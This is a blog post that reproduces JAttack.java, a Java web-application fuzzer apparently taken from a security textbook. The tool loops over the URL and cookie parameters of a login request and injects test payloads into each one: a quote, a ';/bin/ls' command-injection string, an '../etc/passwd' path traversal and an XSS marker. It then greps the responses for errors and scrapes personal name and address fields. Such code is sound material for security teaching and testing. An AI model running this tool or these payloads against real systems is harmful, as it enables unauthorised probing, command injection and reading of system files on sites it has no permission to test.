'jattack'에 해당되는 글 1건

  1. 2009.04.15 jattack.java
// JAttack.java
// by Dafydd Stuttard

import java.net.*;
import java.io.*;

class Param
{
String name, value;
Type type;
boolean attack;

Param(String name, String value, Type type, boolean attack)
{
this.name = name;
this.value = value;
this.type = type;
this.attack = attack;
}

enum Type
{
URL, COOKIE, BODY
}
}

interface PayloadSource
{
boolean nextPayload();
void reset();
String getPayload();
}

class PSNumbers implements PayloadSource
{
int from, to, step, current;
PSNumbers(int from, int to, int step)
{
this.from = from;
this.to = to;
this.step = step;
reset();
}

public boolean nextPayload()
{
current += step;
return current <= to;
}

public void reset()
{
current = from - step;
}

public String getPayload()
{
return Integer.toString(current);
}
}

class PSFuzzStrings implements PayloadSource
{
static final String[] fuzzStrings = new String[]
{
"'", ";/bin/ls", "../../../../../../etc/passwd", "xsstest"
};
int current = -1;

public boolean nextPayload()
{
current++;
return current < fuzzStrings.length;
}

public void reset()
{
current = -1;
}

public String getPayload()
{
return fuzzStrings[current];
}

}

class JAttack
{
// attack config
String host = "wahh-app.com";
int port = 82;
String method = "GET";
String url = "/app/acc/login.jsp";
Param[] params = new Param[]
{
new Param("ts", "29813", Param.Type.URL, true),
new Param("_DARGS",
"/app/acc/login_assumed.jsp", Param.Type.URL, true),
new Param("webabacus_id", "131st22418177-1", Param.Type.COOKIE, true),
new Param("DYN_USER_ID", "100014981", Param.Type.COOKIE, true),
new Param("USER_CONFIRM", "836de5f76c5ec83", Param.Type.COOKIE, true),
new Param("ParkoSearch2007", "true", Param.Type.COOKIE, true),
new Param("JSESSIONID", "DKBHCAOQQWHFFCKTR", Param.Type.COOKIE, true),
new Param("_dyncharset", "UTF-8", Param.Type.URL, true),
new Param("_template", "app/inc/templ.jsp", Param.Type.URL, true),
new Param("personalDetailsURL",
"..%2Facc%2Fregister_p1.jsp", Param.Type.URL, true),
new Param("login", "user@wahh-mail.com", Param.Type.URL, true),
new Param("originalRedirectFromURL", "+", Param.Type.URL, true),
new Param("password", "bestinfw", Param.Type.URL, true),
};
// PayloadSource payloads = new PSNumbers(3000, 3010, 1);
PayloadSource payloads = new PSFuzzStrings();

static final String[] grepStrings = new String[]
{
"error", "exception", "illegal", "invalid", "not found", "xsstest"
};
static final String[] extractStrings = new String[]
{
"<td>Name:</td><td>", "<td>Address:</td><td>"
};

// attack state
int currentParam = 0;

boolean nextRequest()
{
if (currentParam >= params.length)
return false;

if (!params[currentParam].attack)
{
currentParam++;
return nextRequest();
}

if (!payloads.nextPayload())
{
payloads.reset();
currentParam++;
return nextRequest();
}

return true;
}

String buildRequest()
{
// build parameters
StringBuffer urlParams = new StringBuffer();
StringBuffer cookieParams = new StringBuffer();
StringBuffer bodyParams = new StringBuffer();
for (int i = 0; i < params.length; i++)
{
String value = (i == currentParam) ?
payloads.getPayload() :
params[i].value;

if (params[i].type == Param.Type.URL)
urlParams.append(params[i].name + "=" + value + "&");
if (params[i].type == Param.Type.COOKIE)
cookieParams.append(params[i].name + "=" + value + "; ");
if (params[i].type == Param.Type.BODY)
bodyParams.append(params[i].name + "=" + value + "&");
}

// build request
StringBuffer req = new StringBuffer();
req.append(method + " " + url);
if (urlParams.length() > 0)
req.append("?" + urlParams.substring(0, urlParams.length() - 1));
req.append(" HTTP/1.0\r\nHost: " + host);
if (cookieParams.length() > 0)
req.append("\r\nCookie: " + cookieParams.toString());
if (bodyParams.length() > 0)
{
req.append("\r\nContent-Type: application/x-www-form-urlencoded");
req.append("\r\nContent-Length: " + (bodyParams.length() - 1));
req.append("\r\n\r\n");
req.append(bodyParams.substring(0, bodyParams.length() - 1));
}
else req.append("\r\n\r\n");

return req.toString();
}

String issueRequest(String req) throws UnknownHostException, IOException
{
Socket socket = new Socket(host, port);
OutputStream os = socket.getOutputStream();
os.write(req.getBytes());
os.flush();

BufferedReader br = new BufferedReader(new InputStreamReader(
socket.getInputStream()));
StringBuffer response = new StringBuffer();
String line;
while (null != (line = br.readLine()))
response.append(line);

os.close();
br.close();
return response.toString();
}

String parseResponse(String response)
{
StringBuffer output = new StringBuffer();

output.append(response.split("\\s+", 3)[1] + "\t");
output.append(Integer.toString(response.length()) + "\t");

for (String grep : grepStrings)
if (response.indexOf(grep) != -1)
output.append(grep + "\t");

for (String extract : extractStrings)
{
int from = response.indexOf(extract);
if (from == -1)
continue;
from += extract.length();
int to = response.indexOf("<", from);
if (to == -1)
to = response.length();
output.append(response.subSequence(from, to) + "\t");
}

return output.toString();
}

void doAttack()
{
System.out.println("param\tpayload\tstatus\tlength");
String output = null;

while (nextRequest())
{
try
{
output = parseResponse(issueRequest(buildRequest()));
}
catch (Exception e)
{
output = e.toString();
}
System.out.println(params[currentParam].name + "\t" +
payloads.getPayload() + "\t" + output);
}
}

public static void main(String[] args)
{
new JAttack().doAttack();
}
}
Posted by 김주일